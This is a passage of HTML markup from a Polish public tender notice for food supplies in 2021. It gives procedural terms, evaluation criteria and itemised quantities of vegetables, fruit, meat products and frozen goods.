wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>TERMIN PŁATNOSCI</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian zgodnie z zapisami umowy stanowiącej załącznik nr 4 do SIWZ</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-12-03</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>WARZYWA I OWOCE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>WARZYWA ŚWIEŻE, OWOCE Banany kg 1050 Arbuz (odVI-IX) kg 120 Ananas świeży szt 60 Brukselka świeża (IX) kg 10 Brzoskwinie (od V-IX) kg 240 Buraki kg 750 Brokuły szt 170 Bazylia doniczka szt 40 Borówki op 0,5 kg (VII, VIII) szt 5 Cebula kg 650 Cukinia kg 60 Cytryna kg 140 Czosnek siatka 1 kg szt 35 Dynia owoc IX - XI kg 110 Fasolka szparagowa żółta (IX) kg 5 Imbir korzeń kg 1 Jabłka kg 1350 Gruszka kg 435 Kalafior świeży szt 220 Kalarepa szt 110 Kapusta biała (od I-IV i IX-XII) kg 1000 Kapusta biała młoda (od V-VIII) kg 400 Kapusta włoska szt 140 Kapusta czerwona kg 420 Kiwi pakowane pojedynczo szt 1400 Koperek świeży PĘCZKI 1800 Kapusta pekińska –główka główka 120 Lubczyk doniczka szt 30 Marchew korzeń kg 1050 Mandarynki kg 75 Maliny 250g szt 10 Mango kg 2 Melon kg 3 Mięta doniczka szt 40 Nektarynka (od V-IX) kg 120 Oregano doniczka szt 15 Ogórki zielone świeże (VII, VIII, IX) kg 140 Ogórki zielone świeże ( I-VI, X-XII) kg 370 Papryka czerwona świeża( I-VI, X-XII) kg 90 Papryka czerwona świeża (VII, VIII, IX ) kg 40 Papryka żółta świeża kg 15 Pieczarki świeże kg 200 Pietruszka korzeń kg 600 Pomidory (od I-VI i od X do XII) kg 250 Pomidory (VII, VIII, IX) kg 120 Pomidorki koktajlowe op. 250g szt 15 Pomarańcza kg 130 Por kg 470 Rabarbar - m-c lipiec, sierpień kg 5 Rzodkiewka pęczek 200 Rozmaryn doniczka szt 25 Rukola liście op 100g szt 10 Roszponka liście op 100g szt 10 Sałata zielona główka 190 Sałata lodowa główka 30 Seler korzeń kg 850 Seler naciowy 0,5 kg szt 10 Szczypiorek świeży pęczek 415 Szparagi m-c maj pęczek 100 Tymianek doniczka szt 10 Truskawki - m-c czerwiec, lipiec kg 5 Winogrono kg 7 Zielona pietruszka świeża pęczek pęczek 1600 Ziemniaki młode (V, VI, VII) kg 2500 Ziemniaki jadalne kg 13000 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, 15300000-1, 03200000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>MIĘSO I PRZETWORY</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>MIĘSO I PRZETWORY Karkówka wieprzowa b/k surowa kg 280 Łopatka wieprzowa b/k zmielona kg 950 Mięso gulaszowe krojone w kostkę kg 400 Schab b/k surowy kg 790 szynka b/k kulka kg 175 Żeberka I klasa kg 100 Polędwica wieprzowa kg 8 Filet z kurczaka bez chrząstki świeży kg 1800Kurczak cały świeży, patroszony, tusza kg 55 Filet z indyka kg 120 Skrzydła z indyka kg 100 Porcje rosołowe świeźe kg 1200 Udo z kurczaka świeźe, surowe bez kości krzyzowej kg 950 Pałka z kurczaka kg 30 Udziec z kurczaka kg 5 Boczek parzony kg 90 Kieł. biała cieńka delikatesowa 86% miesa kg 3 Kieł. typu farmerska kg 6 Kieł. typu kanapkowa kg 2,6 Kieł. typu śląska 90% miesa kg 90 Kieł. typu śląska 90% miesa - cienka kg 30 Kieł. typu zielonogórska kg 2 Kieł. typu zwyczajna kg 140 Kiełbaski pieprzowe - cienkie kg 30Kieł. typu żywiecka kg 15 Kieł. Typu Wiejska kg 2 Kabanosy wieprzowe kg 8 Łopatka wieprzowa wędlina -73 % mięsa kg 5 Mielonka wieprz. kg 1 Mielonka zapiekana kg 1 Ogonówka parzona kg 25 Parówki cieńkie 85% mięsa kg 65 Polędwica typu sopocka kg 30 Polędwiczka wędzona kg 7 polędwica staropolska kg 8 Salami kg 5 Serdelki kg 20 szynka bamberka 73 % mięsa kg 10 Szynka gotowana kg 40 szynka bez wędzenia 74 % mięsa kg 20 szynka starowiejska kg 8 Szynka konserwowa kg 18 szynka pieczona 73 % mięsa kg 17szynka polska kg 9 Szynka tyrolska kg 5 szynka wiejska kg 18 szynka wiejska wędzona 99% mięsa kg 12 szynka ze wsi 96,5 % mięsa kg 10 szynka drobiowa 85 % mięsa kg 40 szynka delikatesowa z kurcząt 89% mięsa kg 10 szynka -pierś o smaku maslanym 79% mięsa kg 10 szynka - polędwica z kurcząt - 89% mięsa kg 10 szynka drobiowa z papryką - 89% mięsa kg 10Pierś pieczona z pomidorami i ziołami - 97 % mięsa kg 10 Pierś pieczona 97% mięsa kg 10Wędlina drobiowa kg 8Szynkowa wieprzowa kg 17Smalec kg 2 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, 15100000-9, 15131100-6, 15110000-2, 15131500-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>MROŻONKI, RYBY MROŻONE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>MROŻONKI, RYBY MROŻONE, PRZETWORY RYBNE Brokuły mrożone op 2 kg op 110 Brukselka mrożona op 2,5 kg op 70 Fasolka szparagowa cieta op 2,5 op 100 Fasolka żółta cała 2,5kg op 38 Groszek mrożony op 2,5 op 45 Kalafior mrożony op 2 kg op 170 Lody śmietankowe intense 1 litr szt 12 Makrela wędzona kg 12Marchew mrożona op 2,5 kg op 120 Marchew z groszkiem mrożona op 2,5 kg op 149 Marchewka mini op 2,5 kg op 150 Marchew plastry faliste op 2,5kg op 25 Mieszanka chińska 450g szt 200 Mieszanka europejska 2,5 kg 3 składnikowa (kalafior, brokuł, marchewka) op 111 Matias – śledź solony wiaderko 2kg szt 70 Pyzy drożdżowe op 9 szt op 1300 Papryka trio paski op 2,5 kg op 15 Wiśnie mrożone op 2,5 kg op 35 Truskawki mrożone op 2,5 kg op 14 Czarna porzeczka 2,5 kg op 2 Malina 2,5 kg op 8 Mieszanka kompotowa op 2,5 kg szt 6 Ryba mrozona mintaj SHP kg 120 Ryba mrożona dorsz SHP kg 220Ryba mrozona morszczuk SHP kg 200 Ryba mrożona miruna SHP kg 300 Szpinak mrozony op2,5 kg op 21 Włoszczyzna w paski op 2,5 kg op 180 Warzywa na patelnie (premium, azjatyckie, wykwintne, wiejskie) 450g op 15 Zupa wiosenna 8 składnikowa op 2,5 kg op 30 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, 15331100-8, 15229000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: 